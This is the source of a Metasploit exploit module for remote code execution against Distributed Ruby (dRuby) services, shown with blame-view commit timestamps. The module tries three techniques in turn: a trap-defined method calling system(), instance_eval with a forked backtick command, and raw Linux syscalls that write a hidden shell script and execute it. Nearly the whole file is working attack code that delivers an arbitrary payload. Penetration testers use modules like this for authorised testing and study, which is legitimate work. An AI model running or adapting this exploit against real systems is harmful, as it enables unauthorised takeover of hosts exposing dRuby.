metasploit-framework/modules/exploits/linux/misc/drb_remote_codeexec.rb

119 lines
3.3 KiB
Ruby
Raw Normal View History

2016-12-23 14:12:22 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'drb/drb'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2017-11-30 11:46:03 +00:00
include Msf::Exploit::FileDropper
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
2016-12-22 14:37:16 +00:00
'Name' => 'Distributed Ruby Remote Code Execution',
2013-08-30 21:28:54 +00:00
'Description' => %q{
2016-11-04 18:48:29 +00:00
This module exploits remote code execution vulnerabilities in dRuby.
2013-08-30 21:28:54 +00:00
},
'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
2016-12-22 14:37:16 +00:00
[ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
2016-12-28 12:10:46 +00:00
[ 'URL', 'http://bugkraut.de/posts/tainting' ]
2013-08-30 21:28:54 +00:00
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 32768,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
2016-11-04 18:47:36 +00:00
'Targets' => [
2016-12-28 12:10:46 +00:00
['Automatic', {}],
2016-11-04 18:47:36 +00:00
],
2013-08-30 21:28:54 +00:00
'DisclosureDate' => 'Mar 23 2011',
'DefaultTarget' => 0))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
])
2013-08-30 21:28:54 +00:00
end
2017-11-30 11:46:03 +00:00
def method_trap(p)
p.send(:trap, 23,
:"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
p.send(:my_eval, payload.encoded)
end
def method_instance_eval(p)
p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
end
def method_syscall(p)
filename = "." + Rex::Text.rand_text_alphanumeric(16)
begin
# syscall to decide wether it's 64 or 32 bit:
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
j = p.send(:syscall, 20)
# syscall open
i = p.send(:syscall, 8, filename, 0700)
# syscall write
p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
# syscall close
p.send(:syscall, 6, i)
# syscall fork
p.send(:syscall, 2)
# syscall execve
p.send(:syscall, 11, filename, 0, 0)
# likely 64bit system
rescue Errno::EBADF
# syscall creat
i = p.send(:syscall,85,filename,0700)
# syscall write
p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
# syscall close
p.send(:syscall,3,i)
# syscall fork
p.send(:syscall,57)
# syscall execve
p.send(:syscall,59,filename,0,0)
end
register_file_for_cleanup(filename) if filename
#print_status("payload executed from file #{filename}") unless filename.nil?
#print_status("make sure to remove that file") unless filename.nil?
end
2013-08-30 21:28:54 +00:00
def exploit
serveruri = datastore['URI']
2017-11-30 11:46:03 +00:00
2013-08-30 21:28:54 +00:00
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
end
2016-11-04 18:54:26 +00:00
2017-11-30 11:46:03 +00:00
methods = ["instance_eval", "syscall", "trap"]
methods.each do |method|
begin
print_status("trying to exploit #{method}")
send("method_" + method, p)
handler(nil)
break
rescue SecurityError => e
print_error("target is not vulnerable to #{method}")
end
2016-11-04 18:54:26 +00:00
end
2017-11-30 11:46:03 +00:00
2013-08-30 21:28:54 +00:00
end
end